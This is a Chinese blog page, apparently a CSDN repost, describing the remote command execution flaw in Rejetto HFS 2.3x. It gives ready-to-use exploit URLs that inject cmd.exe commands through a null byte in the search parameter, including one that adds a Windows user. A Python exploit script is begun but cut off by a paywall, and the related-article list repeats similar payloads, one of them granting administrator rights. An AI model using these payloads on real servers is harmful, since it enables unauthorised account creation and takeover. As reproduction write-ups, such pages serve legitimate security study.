HFS的远程命令执行漏洞(RCE)

最新推荐文章于 2024-06-11 16:48:40 发布
最新推荐文章于 2024-06-11 16:48:40 发布
阅读量3.2k 收藏 7
点赞数
文章标签: 操作系统 python
原文链接:http://www.cnblogs.com/KevinGeorge/p/8606163.html
版权
本文介绍了HFS HTTP文件服务器2.3c及其以前版本中的远程命令执行漏洞,该漏洞源于parserLib.pas文件处理空字节不当,允许远程攻击者通过特定payload执行任意程序。攻击者可以使用'findMacroMarker'函数中的'%00'序列发起攻击,例如执行'cmd.exe /c net user test1234 1234 /add.'命令。此漏洞利用需HFS以管理员权限运行。
摘要由CSDN通过智能技术生成

一、HFS漏洞

1、影响版本 : 2.3c以前的2.3x版本

2、HFS:

HFS是HTTP File Server,国外的一款HTTP 文件服务器软件,简单易上手。

3、漏洞描述:

HTTP File Server是一款专为个人用户所设计的HTTP文件服务器,它提供虚拟档案系统,支持新增、移除虚拟档案资料夹等。

Rejetto HTTP File Server 2.3c及之前版本中的parserLib.pas文件中的‘findMacroMarker’函数中存在安全漏洞,该漏洞源于parserLib.pas文件没有正确处理空字节。远程攻击者可借助搜索操作中的‘%00’序列利用该漏洞执行任意程序。

4、攻击payload及过程:

4.1 Payload:http://127.0.0.1:8080/?search==%00{.exec|cmd.exe /c [Command-String].}

4.2攻击过程实例:

http://127.0.0.1:8080/?search==%00{.exec|cmd.exe /c net user test1234 1234 /add.}

说明这个OK的前提是HFS以管理员权限运行: 

5、payload:

 1 #-*- coding:utf-8 -*-
 2 
 3 """
 4 这个脚本是检测是否有HFS漏洞的
 5 当HFS版本处于2.3c机器之前的HFS2.3x版本均可以
 6 当HFS以管理员身份运行时候可以get-shell
 7 原理是创建一个新用户,设置密码和权限,然后你就可以RDP了
 8 """
 9 
10 #引入依赖的包、库文件
11 import time
12 import uuid
13 import requests
14 from optparse import OptionParser
15 
16 
17 #定义扫描类
18 class
最低0.47元/天 解锁文章
weixin_30527323
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HFS远程命令执行漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-28 5586
漏洞程序下载地址:Http File Server 这里说一下,再Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。 运行程序截图如下 尝试访问该软件提供的web服务 web服务是这个样子的,这个web服务的搜索处存在漏洞 一、手工利用 payload如下 http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos
HFS Cmd执行漏洞入侵与防御
u010005482的专栏
09-19 5545
最近爆出了HFS(Http File Server)爆出了这个漏洞
如何将本地HFS文件共享服务发布到公网并实现远程上传下载内网文件
m0_59281987的博客
05-09 570
本文主要介绍如何在Windows系统电脑使用HFS并结合cpolar内网穿透工具搭建低成本NAS,并实现使用公网地址远程访问管理本地局域网电脑存储的文件。云存储作为一个新概念,在前些年炒的火热,虽然伴随一系列黑天鹅事件,让热度快速下降,但云存储带来的方便深入人心。因此在大厂的云存储产品热度下降后,私人的NAS热度快速上升,其中最具代表性的,必然是群晖NAS。但群晖价格太高,个人和小型企业无法承担。实际上,我们完全可以使用cpolar,与特定软件配合,打造属于自己的低成本NAS。
SSRF利用HFS远程命令执行漏洞RCE
qq_45884775的博客
04-09 4878
0x00SSRF漏洞介绍: SSRF漏洞(服务器端请求伪造):是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)。 0x01SSRF漏洞原理: SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。利用的是服务端的请求伪造。SSRF是利用存在缺陷的we
国外软件HFS 2.3x 远程命令执行漏洞 (本程序某些YY黑阔大牛抓鸡抓IP工具中使用到本软件)本站教程教习如何梨园远程命令执行。。中国寒龙...
weixin_30537391的博客
09-07 606
这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。 1 2 http://localhost:80/?search==%00{.exec|cmd.} http://localhost:80/search=%00{.exec|cmd.} 注:有些版本search前面是没有?的。 测试部分:百度搜HFS默认就是2.3...
HFS文件服务器RCE 漏洞复现(CVE-2024-23692)
最新发布
huangyongkang666的博客
06-11 1561
Rejetto HFS是一款简单易用的Web文件服务器,可通过网络或互联网共享文件。该软件创建了一个Web界面,让用户可以直接在运行HFS软件的机器上上传或下载文件,在最新的Rejetto HTTP文件服务器(HFS)2.x版本中,发现了一个严重的安全漏洞,标记为CVE-2024-23692HFS 版本 2.4.0 RC7 和 2.3mCVE-2024-23692漏洞特别影响 HFS 版本 2.4.0 RC7 和 2.3m。根本原因在于服务器处理用于呈现 HTTP 响应的默认模板的方式。
Apache OFBiz 路径遍历导致RCE漏洞
weixin_43167326的博客
06-05 604
WordPress CMS 上的网站数以亿计,该平台及其用户称为威胁行动者的庞大攻击面,因此常常是恶意攻击的目标。其中很多攻击通过插件安装恶意软件,轻松导致数千个甚至数百万个站点易遭攻击。攻击者还倾向于快速利用WordPress 中发现的漏洞
HFS2.3漏洞利用.rar
12-28
总结一下,HFS2.3漏洞主要体现在代码审核不足,导致可能的权限提升和远程服务滥用。这个压缩包中的“HFS2.3攻击器.exe”可能是一个恶意工具,用于测试或利用这个漏洞。防范措施包括软件更新、密码管理、安全服务的...
HFS漏洞利用工具 e语言源码
03-08
HFS漏洞利用工具 e语言源码
HFS修复漏洞
09-20
HFS修复漏洞
HFS提权工具,hfs漏洞提权软件
12-10
HFS提权工具,hfs漏洞提权软件
HFS命令行客户端_HFClient
04-18
最新版本:https://download.csdn.net/download/wang1u1u/15433177 因项目需要,搜罗全网没有找到合适的命令行下下载上传文件的客户端,所以自己手工编写了一个,下载大文件时会有进度条提醒,只经过简单测试 具体使用如下:最新版本请留言! 配合HFS使用效果更好 #下载 HFClient.exe get http://ip:port/test.rar D:\test.rar username:password #上传 HFClient.exe put D:\test.rar http://ip:port/ username:password
HFS命令行客户端_HFClient(最新版本)
02-23
因项目需要,搜罗全网没有找到合适的命令行下下载上传文件的客户端,所以自己手工编写了一个,下载大文件时会有进度条提醒,只经过简单测试 具体使用如下:最新版本请留言! 配合HFS使用效果更好 #下载 HFClient.exe get http://ip:port/test.rar D:\test.rar username:password #上传 HFClient.exe put D:\test.rar http://ip:port/ username:password
hfs2.3b#279随波汉化版
05-21
最新稳定版:2.2f 随波汉化版 最新测试版:2.3 beta build #279 随波汉化版
hfs官网下载的 绝对无后门
08-01
专为个人用户所设计的 HTTP 档案系统 - Http File Server,如果您觉得架设 FTP Server 太麻烦,那么这个软件可以提供您更方便的档案传输系统,下载后无须安装,只要解压缩后执行 hfs.exe,于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键,即可新增/移除虚拟档案资料夹,或者,直接将欲加入的档案拖曳至此窗口,便可架设完成个人 HTTP 虚拟档案服务器。
HFS2.0提权教程.rar
12-10
HFS2.0提权教程,hfs漏洞
远程执行_HFS远程命令执行漏洞复现
weixin_42315338的博客
01-15 290
这里说一下,在Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。漏洞程序下载地址见评论运行程序截图如下尝试访问该软件提供的web服务web服务是这个样子的,这个web服务的搜索处存在漏洞一、手工利用payload如下http://127.0.0.1/?...
安全开发-HFS漏洞利用脚本编写
niqiu320的博客
05-12 950
0x01 安全开发-HFS漏洞利用脚本编写 下载并在虚拟机2008里面(因为主机防火墙缘故)开启HFS~网络文件服务器 2.3Beta 一、攻击准备 复制HFS的IP在浏览器中,并且在IP后添加用户exp /?search==%00%7B.exec%7Ccmd.exe%20/c%20net%20user%20TechSupport%20admin.12345%20/add%20%26%20net%20localgroup%20administrators%20admin.12345%20/add.%7D
HFS远程命令执行漏洞入侵抓鸡黑阔服务器
aiquan9342的博客
12-24 1415
先来科普一下: HFS是什么? hfs网络文件服务器 2.3是专为个人用户所设计的HTTP档案系统,如果您觉得架设FTP Server太麻烦,那么这个软件可以提供您更方便的网络文件传输系统,下载后无须安装,只要解压缩后执行 hfs.exe,于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键,即可新增/移除虚拟档案资料夹,或者直接将欲加入的档案拖曳至此窗口,便...
hfs socket
07-28
您好!对于您提到的 "hfs socket",我不太清楚具体指的是什么。"HFS" 可能是各种不同的含义,包括但不限于以下几种可能: 1. "HFS" 可能指 "Hierarchical File System",是一种在苹果电脑上常见的文件系统。它主要用于组织和管理文件和文件夹。 2. "HFS" 也可能是指 "HTTP File Server",是一种用于在本地计算机上共享文件和文件夹的简单HTTP服务器软件。 3. 如果您指的是 "HFS socket",可能是指在网络编程中使用的套接字(socket)连接,用于在 HTTP File Server 或其他服务器之间进行通信。 如果您能提供更多的上下文或信息,我将能够更准确地回答您的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值